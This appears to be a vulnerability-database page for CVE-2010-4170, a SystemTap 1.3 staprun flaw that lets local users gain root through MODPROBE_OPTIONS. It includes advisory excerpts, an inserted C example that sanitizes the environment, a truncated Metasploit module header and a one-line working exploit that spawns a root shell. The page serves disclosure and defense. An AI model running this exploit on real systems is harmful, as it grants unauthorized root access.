CVE-2010-4170

Published: 07/12/2010 Updated: 13/02/2023
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 730
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The staprun runtime tool in SystemTap 1.3 does not properly clear the environment before executing modprobe, which allows local users to gain privileges by setting the MODPROBE_OPTIONS environment variable to specify a malicious configuration file.
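The mitigation pattern this summary points to, as an added C example (not SystemTap's code and not its actual patch): a privileged launcher builds a fresh, allowlisted environment for the helper it executes instead of passing the caller's environment through. The allowlist, `SAFE_PATH` and all function names are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Assumed allowlist: the only caller variables the helper may inherit. */
static const char *const ALLOWED[] = { "LANG", "LC_ALL", "TERM" };
#define N_ALLOWED (sizeof ALLOWED / sizeof ALLOWED[0])
#define SAFE_PATH "PATH=/usr/sbin:/usr/bin:/sbin:/bin"

/* Return the value of `name` in a NULL-terminated env array, or NULL. */
const char *env_get(char *const env[], const char *name) {
    size_t n = strlen(name);
    for (size_t i = 0; env && env[i]; i++)
        if (strncmp(env[i], name, n) == 0 && env[i][n] == '=')
            return env[i] + n + 1;
    return NULL;
}

/* Build a fresh environment: a fixed PATH plus the first occurrence of each
 * allowlisted variable; everything else (MODPROBE_OPTIONS included) is
 * dropped. Entries point into `env`; the caller frees only the array. */
char **sanitized_env(char *const env[]) {
    char **out = calloc(N_ALLOWED + 2, sizeof *out); /* PATH + allowed + NULL */
    size_t k = 0;
    if (!out) return NULL;
    out[k++] = (char *)SAFE_PATH;
    for (size_t a = 0; a < N_ALLOWED; a++) {
        const char *v = env_get(env, ALLOWED[a]);
        if (v) out[k++] = (char *)(v - strlen(ALLOWED[a]) - 1); /* "NAME=value" */
    }
    return out;
}

/* Exec the helper by absolute path with the sanitized environment only. */
int exec_helper(const char *path, char *const argv[], char *const env[]) {
    char **clean = sanitized_env(env);
    if (!clean) return -1;
    execve(path, argv, clean); /* returns only on failure */
    free(clean);
    return -1;
}

int main(void) {
    /* Constructed sample environment for the demonstration. */
    char *hostile[] = { "MODPROBE_OPTIONS=-C constructed.conf", "LANG=C", NULL };
    char **clean = sanitized_env(hostile);
    for (size_t i = 0; clean && clean[i]; i++) puts(clean[i]);
    free(clean);
}
```

An allowlist is used rather than removing `MODPROBE_OPTIONS` by name, so variables the launcher's author never considered are dropped as well.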

Vulnerable Product

systemtap systemtap 1.3

Vendor Advisories

Debian Bug report logs - #603946: CVE-2010-4170 and CVE-2010-4171
Package: systemtap; Maintainer for systemtap is Ritesh Raj Sarraf <rrs@debian.org>; Source for systemtap is src:systemtap
Reported by: Moritz Muehlenhoff <jmm@debian.org>
Date: Thu, 18 Nov 2010 18:42:02 UTC
Severity: grave
Tags: s ...

Several vulnerabilities were discovered in SystemTap, an instrumentation system for Linux:
CVE-2011-2503: It was discovered that a race condition in staprun could lead to privilege escalation.
CVE-2010-4170: It was discovered that insufficient validation of environment variables in staprun could lead to privilege escalation.
CVE-2010-41 ...

Exploits

##
# This module requires Metasploit: metasploit.com/download
# Current source: github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf: ...
CVE-2010-4170
printf "install uprobes /bin/sh" > exploitconf; MODPROBE_OPTIONS="-C exploitconf" staprun -u whatever
RHEL Advisory: rhn.redhat.com/errata/RHSA-2010-0894.html ...
This code demonstrates a local privilege escalation vulnerability in systemtap ...
This Metasploit module attempts to gain root privileges by exploiting a vulnerability in the staprun executable included with SystemTap version 1.3. The staprun executable does not clear environment variables prior to executing modprobe, allowing an arbitrary configuration file to be specified in the MODPROBE_OPTIONS environment variable, resulting ...